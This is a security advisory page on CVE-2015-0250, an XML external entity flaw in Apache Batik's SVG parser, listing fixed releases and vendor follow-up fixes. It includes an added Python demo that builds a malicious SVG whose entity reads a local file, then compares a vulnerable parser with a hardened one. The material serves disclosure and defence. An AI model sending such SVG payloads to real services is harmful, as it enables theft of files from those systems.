SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Apache Batik
Vendors:   Apache Software Foundation
Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
SecurityTracker Alert ID:  1032781
SecurityTracker URL:  http://securitytracker.com/id/1032781
CVE Reference:   CVE-2015-0250   (Links to External Site)
Updated:  Jul 3 2015
Original Entry Date:  Jul 3 2015
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): 1.0 - 1.7
Description:   A vulnerability was reported in Apache Batik. A remote user can conduct XML external entity (XXE) attacks against the SVG parser.

SVG is XML, and Batik's XML parser resolved external entities declared in a document's DTD. A remote user can supply a specially crafted SVG document to the target interface that declares an external entity whose SYSTEM identifier points at a local file (or another URI) and references that entity from the document body. When the target service parses the document, the entity is expanded, the referenced file is read with the privileges of the target service, and its contents can be disclosed to the remote user.
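The disclosure described above, as an added example that is not part of this advisory and not Batik's own code: it uses Python's standard-library SAX parser in place of Batik to parse a constructed SVG carrying an external entity, once with external general entities enabled (the behaviour the advisory describes) and once with them disabled. The secret file, its contents, the file name and all function names are constructed for the demonstration.

```python
"""Added example (not from the advisory or from Batik): XXE via an SVG file.

SVG is XML, so any SVG consumer that lets its XML parser resolve external
general entities can be made to read local files.  This demo uses Python's
stdlib SAX parser instead of Batik; the payload shape is what matters.
All names, the secret file and its contents are constructed for the demo.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file readable by the service account.
SECRET_CONTENT = "db_password=hunter2\n"


def write_secret_file() -> str:
    """Create a throwaway file that plays the role of e.g. /etc/passwd."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SECRET_CONTENT)
    return path


def build_malicious_svg(target_path: str) -> str:
    """Constructed attacker-supplied SVG: the internal DTD declares an external
    entity whose SYSTEM id is a file: URL, and <text> references it, so the
    file contents land where the renderer expects glyph data."""
    file_url = pathlib.Path(target_path).resolve().as_uri()
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE svg [\n'
        f'  <!ENTITY xxe SYSTEM "{file_url}">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="50">\n'
        '  <text x="10" y="20">&xxe;</text>\n'
        '</svg>\n'
    )


class TextCollector(ContentHandler):
    """Collects character data inside <text>, i.e. what would be rendered."""

    def __init__(self):
        super().__init__()
        self._in_text = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "text":
            self._in_text = True

    def endElement(self, name):
        if name == "text":
            self._in_text = False

    def characters(self, content):
        if self._in_text:
            self.chunks.append(content)


def render_text(svg: str, resolve_external_entities: bool) -> str:
    """Parse the SVG and return the text that would be drawn.

    True mirrors a parser that follows SYSTEM entities (the behaviour the
    advisory describes); False is the hardened setting, under which the
    entity reference is skipped and nothing is read from the file.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg.encode("utf-8")))
    return "".join(handler.chunks)


def run_demo() -> dict:
    """Run the vulnerable and hardened parses against the same payload."""
    secret_path = write_secret_file()
    try:
        svg = build_malicious_svg(secret_path)
        return {
            "vulnerable": render_text(svg, resolve_external_entities=True),
            "hardened": render_text(svg, resolve_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for mode, text in run_demo().items():
        print(f"{mode:10s} rendered text: {text!r}")
```

The vulnerable parse returns the secret file's contents as the text to be rendered; the hardened parse returns an empty string because the entity is skipped. For Batik itself the remedy is the vendor's fixed release. For application code that parses SVG with a JAXP/Xerces `XMLReader` of its own, the equivalent check is that `http://apache.org/xml/features/disallow-doctype-decl` is set to true, or, where a DOCTYPE must be accepted, that `http://xml.org/sax/features/external-general-entities` and `http://xml.org/sax/features/external-parameter-entities` are set to false.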

Nicolas Gregoire of AGARRI and Kevin Schaller of ERNW each separately reported this vulnerability.

Impact:   A remote user can read files on the target system with the privileges of the target service.
Solution:   The vendor has issued fixed releases: 1.8 (March 2015) and the maintenance releases 1.6.1 and 1.7.1 (May 2015). Users of versions 1.0 through 1.7 should upgrade to one of these.

The vendor's advisory is available at:

http://xmlgraphics.apache.org/security.html

Vendor URL:  xmlgraphics.apache.org/security.html (Links to External Site)
Cause:   Input validation error (the XML parser resolved external entities in attacker-supplied SVG)
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 3 2015 (IBM Issues Fix for IBM WebSphere Portal) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
IBM has issued a fix for IBM WebSphere Portal.
Aug 27 2015 (IBM Issues Fix for IBM WebSphere Application Server) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
IBM has issued a fix for IBM WebSphere Application Server 7, 8, and 8.5.
Jan 15 2016 (Red Hat Issues Fix for JBoss BRMS) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
Red Hat has issued a fix for JBoss BRMS for Red Hat Enterprise Linux.
Jan 15 2016 (Red Hat Issues Fix for JBoss BPM Suite) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
Red Hat has issued a fix for JBoss BPM Suite for Red Hat Enterprise Linux.



 Source Message Contents



[Original Message Not Available for Viewing]








Copyright 2019, SecurityGlobal.net LLC